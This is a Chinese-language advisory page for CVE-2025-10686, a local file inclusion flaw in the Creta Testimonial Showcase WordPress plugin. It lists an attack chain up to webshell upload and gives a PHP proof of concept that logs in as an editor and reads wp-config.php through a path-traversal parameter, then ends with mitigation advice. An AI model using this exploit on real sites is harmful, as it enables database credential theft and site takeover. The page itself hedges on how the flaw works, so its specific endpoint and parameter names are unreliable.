CVE-2025-10686: Creta Testimonial Showcase插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-10686

漏洞类型

本地文件包含(LFI)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Creta Testimonial Showcase WordPress插件

漏洞概述

CVE-2025-10686是WordPress Creta Testimonial Showcase插件中的一个高危本地文件包含漏洞。该漏洞存在于1.2.4版本之前的所有版本中，允许具有编辑者级别权限及以上的认证攻击者包含和执行服务器上的任意文件。由于WordPress插件中可能存在不安全地使用include/require语句处理用户输入，攻击者可以通过构造特定的路径遍历Payload来读取和执行任意PHP文件。这可能导致敏感信息泄露（如wp-config.php数据库凭证）以及远程代码执行，从而完全接管WordPress站点。该漏洞的CVSS评分为7.2，属于高危级别，攻击向量为网络，认证要求为高权限，无需用户交互即可利用。

技术细节

Creta Testimonial Showcase插件在处理文件包含请求时存在安全缺陷。攻击者可以通过在HTTP请求中注入路径遍历序列（如../）来包含服务器上的任意文件。该插件的某些端点（如ajax处理器或直接调用）未对用户输入进行充分的路径验证和过滤，允许攻击者绕过基本的目录限制。具体来说，攻击者可能利用类似?action=some_action&file=../../wp-config.php的请求参数来读取WordPress配置文件，获取数据库凭据和认证密钥。进一步地，如果攻击者能够将恶意PHP代码写入服务器可访问的位置（如上传目录），则可以通过文件包含执行该代码，实现远程代码执行。漏洞的利用需要攻击者拥有WordPress站点上的编辑者角色或更高权限账户。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress站点编辑者级别或更高权限的账户

STEP 2

步骤2

攻击者构造包含路径遍历序列的恶意请求，如?action=creta_testimonial_file_include&file=../../wp-config.php

STEP 3

步骤3

插件未验证用户输入的file参数，直接传递给include/require语句

STEP 4

步骤4

攻击者成功读取服务器上的敏感文件（如wp-config.php），获取数据库凭据

STEP 5

步骤5

如果上传功能存在，攻击者可上传包含webshell的PHP文件

STEP 6

步骤6

通过文件包含执行恶意PHP代码，获得远程命令执行能力

STEP 7

步骤7

攻击者完全接管WordPress站点，可能进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2025-10686 PoC - Local File Inclusion in Creta Testimonial Showcase < 1.2.4
// Requires editor-level WordPress account

$target = 'http://target-wordpress-site.com';
$username = 'editor_user';
$password = 'editor_password';

// Login to WordPress to obtain authentication cookies
$login_url = $target . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);

// Exploit LFI vulnerability - Read wp-config.php
$exploit_url = $target . '/wp-admin/admin-ajax.php?action=creta_testimonial_file_include&file=../../wp-config.php';
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

// If RCE is possible, include a malicious uploaded file
// $rce_url = $target . '/wp-admin/admin-ajax.php?action=creta_testimonial_file_include&file=../../uploads/malicious.php';

curl_close($ch);
echo 'Response: ' . $response;
?>

影响范围

Creta Testimonial Showcase WordPress插件 < 1.2.4

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 限制编辑者角色的使用，仅授予可信用户该权限；2) 在Web应用防火墙（WAF）中添加针对路径遍历Payload的规则；3) 监控wp-admin目录下的异常请求；4) 考虑暂时禁用Creta Testimonial Showcase插件直至完成升级。